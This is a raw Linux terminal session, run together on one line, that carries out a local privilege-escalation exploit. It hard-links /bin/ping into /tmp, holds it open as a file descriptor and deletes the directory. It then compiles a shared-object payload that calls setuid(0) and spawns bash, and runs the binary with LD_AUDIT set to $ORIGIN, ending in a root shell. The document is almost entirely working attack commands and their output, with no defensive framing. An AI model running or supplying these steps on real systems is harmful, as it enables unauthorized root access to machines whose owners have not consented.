[Star@localhost tmp]$ ls -ld /tmp/ drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ [Star@localhost tmp]$ cd /tmp/ [Star@localhost tmp]$ mkdir exploit [Star@localhost tmp]$ ln /bin/ping /tmp/exploit/target [Star@localhost tmp]$ exec 3< /tmp/exploit/target [Star@localhost tmp]$ ls -l /proc/$$/fd/3 lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target [Star@localhost tmp]$ rm -fr /tmp/exploit/ [Star@localhost tmp]$ ls -l /proc/$$/fd/3 lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted) [Star@localhost tmp]$ cat > payload.c void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } [Star@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c [Star@localhost tmp]$ ls -l /tmp/exploit -rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit [Star@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 [Star@localhost tmp]# whoami root